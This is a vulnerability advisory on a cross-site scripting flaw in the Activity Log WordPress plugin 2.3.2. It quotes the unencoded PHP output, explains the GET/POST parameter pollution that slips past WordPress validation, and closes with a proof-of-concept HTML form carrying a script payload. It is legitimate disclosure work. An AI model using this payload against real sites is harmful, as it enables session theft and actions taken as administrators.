------------------------------------------------------------------------
Cross-Site Scripting in Activity Log WordPress Plugin
------------------------------------------------------------------------
Yorick Koster, July 2016

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A Cross-Site Scripting vulnerability was found in the Activity Log
WordPress Plugin. This issue allows an attacker to perform a wide
variety of actions, such as stealing Administrators' session tokens, or
performing arbitrary actions on their behalf. In order to exploit this
issue, the attacker has to lure/force a logged on WordPress
Administrator into opening a malicious website.

------------------------------------------------------------------------
OVE ID
------------------------------------------------------------------------
OVE-20160724-0022

------------------------------------------------------------------------
Tested versions
------------------------------------------------------------------------
This issue was successfully tested on Activity Log [2] WordPress Plugin
version 2.3.2

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
This issue is fixed in Activity Log version 2.3.3 [3]

------------------------------------------------------------------------
Introduction
------------------------------------------------------------------------
The Activity Log [2] WordPress Plugin helps monitor & log all changes
and activities on a WordPress site. A Cross-Site Scripting vulnerability
was found in the Activity Log WordPress Plugin. This issue allows an
attacker to perform a wide variety of actions, such as stealing
Administrators' session tokens, or performing arbitrary actions on their
behalf. In order to exploit this issue, the attacker has to lure/force a
logged on WordPress Administrator into opening a malicious website.

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
The issue exists in the file classes/class-aal-admin-ui.php and is
caused by the lack of output encoding on the page request parameter. The
vulnerable code is listed below.

public function activity_log_page_func() {
	$this->get_list_table()->prepare_items();
	?>
	<div class="wrap">
		<h2 class="aal-page-title"><?php _e( 'Activity Log',
'aryo-activity-log' ); ?></h2>
	
		<form id="activity-filter" method="get">
			<input type="hidden" name="page" value="<?php echo $_REQUEST['page']
?>" />
			<?php $this->get_list_table()->display(); ?>
		</form>
	</div>

Normally, the page URL parameter is validated by WordPress, which
prevents Cross-Site Scripting. However in this case the value of page is
obtained from $_REQUEST, not from $_GET. This allows for parameter
pollution where the attacker puts a benign page value in the URL and
simultaneously submits a malicious page value as POST parameter.

------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------
<html>
	<body>
		<form
action="http://<target>/wp-admin/admin.php?page=activity_log_page"
method="POST">
			<input type="hidden" name="page"
value="&quot;><script>alert(1);</script>" />
			<input type="submit" value="Submit request" />
		</form>
	</body>
</html>
------------------------------------------------------------------------
References
------------------------------------------------------------------------
[1]
https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_activity_log_wordpress_plugin.html
[2] https://wordpress.org/plugins/aryo-activity-log/
[3] https://downloads.wordpress.org/plugin/aryo-activity-log.zip